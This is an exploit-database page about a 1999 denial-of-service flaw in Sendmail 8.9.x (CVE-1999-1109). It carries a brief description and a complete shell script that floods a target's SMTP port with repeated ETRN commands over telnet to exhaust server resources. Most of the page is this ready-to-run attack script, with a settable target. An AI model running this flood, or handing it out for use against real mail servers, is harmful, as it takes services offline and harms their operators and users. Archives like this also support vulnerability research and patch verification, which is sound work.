[] NeoSense
E X P L O I T S
title author type platform port cve id

Eric Allman Sendmail 8.9.1/8.9.3 - ETRN Denial of Service

Author: Michal Zalewski
type: dos
platform: linux
port: 
date_added: 1999-12-22 
date_updated: 2012-07-09 
verified: 1 
codes: CVE-1999-1109;OSVDB-1182 
tags: 
aliases:  
screenshot_url:  
application_url: 
source: https://www.securityfocus.com/bid/904/info

There is a low-bandwidth dos vulnerability in Sendmail. When a client connects to the sendmail smtpd and sends an ETRN command to the server, the server fork()s and sleeps for 5 seconds. If many ETRN commands are sent to a server, it is possible to exhaust system resources and cause a denial of service or even a reboot of the server.

#!/bin/sh

TARGET=localhost
COUNT=150
SLEEP=1

echo "gurghfrbl.sh - (c) lcamtuf '99"
echo -n "Tickle"

while :; do
echo -n "."
(
NIC=0
while [ "$NIC" -lt "$COUNT" ]; do
echo "ETRN x"
done
) | telnet $TARGET 25 &>/dev/null &
sleep $SLEEP
killall -9 telnet &>/dev/null
done
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.